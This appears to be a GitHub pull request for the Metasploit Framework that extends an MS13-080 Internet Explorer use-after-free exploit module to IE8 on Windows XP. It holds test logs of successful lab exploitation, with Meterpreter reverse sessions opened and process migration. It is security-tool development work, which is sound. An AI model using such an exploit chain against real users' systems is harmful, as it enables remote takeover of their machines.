
win XP IE8 exploit for MS13-080 #4213

Merged
merged 2 commits into from Dec 3, 2014

Conversation

webstersprodigy
Contributor

ie_setmousecapture_uaf only supported IE9 on Windows 7, but the vuln was present in different versions of IE. I tested with Windows XP SP3 and IE8 and the exploit works pretty reliably (included the specific mshtml version in the code). I did not test that I did not break the Win7 IE9 exploit as I didn't have that setup (but there shouldn't be anything changed).

This pull request is probably not very useful in real life - I was just messing around.

@wchen-r7 wchen-r7 self-assigned this Nov 16, 2014
@wchen-r7
Contributor

I have not forgotten this PR. Want to do this but occupied with other stuff atm.

@wchen-r7
Contributor

wchen-r7 commented Dec 3, 2014

Tested:

IE9:

msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://0.0.0.0:8080/mtAFOHcX6lJL
[*]  Local IP: http://10.6.0.118:8080/mtAFOHcX6lJL
[*] Server started.
[*] 10.6.0.209       ie_setmousecapture_uaf - Gathering target information.
[*] 10.6.0.209       ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (770048 bytes) to 10.6.0.209
[*] Meterpreter session 1 opened (10.6.0.118:4444 -> 10.6.0.209:49203) at 2014-12-03 13:43:56 -0600
[*] Session ID 1 (10.6.0.118:4444 -> 10.6.0.209:49203) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (2420)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1088
[+] Successfully migrated to process 

msf exploit(ie_setmousecapture_uaf) >

IE8 (XP):

msf exploit(ie_setmousecapture_uaf) > [*] Using URL: http://172.16.23.1:8080/AcUinEiHgAWdsWM
[*] Server started.
[*] 172.16.23.129    ie_setmousecapture_uaf - Gathering target information.
[*] 172.16.23.129    ie_setmousecapture_uaf - Sending response HTML.
[*] Sending stage (770048 bytes) to 172.16.23.129
[*] Meterpreter session 3 opened (172.16.23.1:4444 -> 172.16.23.129:1951) at 2014-12-03 14:10:42 -0600
[*] Session ID 3 (172.16.23.1:4444 -> 172.16.23.129:1951) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (876)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2252
[+] Successfully migrated to process 

wchen-r7 added a commit to wchen-r7/metasploit-framework that referenced this pull request Dec 3, 2014
Conflicts:
	modules/exploits/windows/browser/ie_setmousecapture_uaf.rb
@wchen-r7 wchen-r7 merged commit 27d5ed6 into rapid7:master Dec 3, 2014
wchen-r7 added a commit that referenced this pull request Dec 3, 2014